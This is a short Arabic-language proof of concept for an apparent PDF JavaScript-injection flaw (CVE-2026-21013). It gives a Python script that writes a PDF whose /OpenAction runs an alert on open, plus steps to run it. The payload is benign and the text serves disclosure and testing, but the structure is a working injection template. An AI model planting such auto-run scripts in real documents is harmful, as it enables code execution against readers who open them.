
يُنشئ ملف PDF مع JavaScript مضمّن لتوضيح CVE-2026-21013، وهو حقن OpenAction يؤدي إلى تنفيذ البرامج النصية في قارئات PDF المعرّضة للخطر.
# generate_pdf_js_inject.py - Creates a PDF with embedded JavaScript
pdf = b"""%PDF-1.7
1 0 obj
<< /Type /Catalog /OpenAction << /S /JavaScript /JS (app.alert('XSS')) >>
>>
endobj
trailer
<< /Root 1 0 R >>
%%EOF
"""
with open("malicious.pdf", "wb") as f:
f.write(pdf)
print("malicious.pdf created. When opened in a vulnerable PDF reader, it will execute JavaScript.")
مولّد PDF لا يعقّم المحتوى المقدَّم من المستخدم قبل تضمينه في ملف PDF. يمكن للمهاجم حقن إدخال /OpenAction من نوع JavaScript يُنفَّذ عند فتح المستند، مما يؤدي إلى تنفيذ نصوص برمجية عبر المواقع (في عارضات الويب) أو تنفيذ كود محلي (في قارئات سطح المكتب التي تدعم JavaScript بالكامل).
شغّل المولّد:
python generate_pdf_js_inject.py
افتح الملف الناتج malicious.pdf في قارئ PDF يدعم JavaScript؛ ستظهر نافذة تنبيه.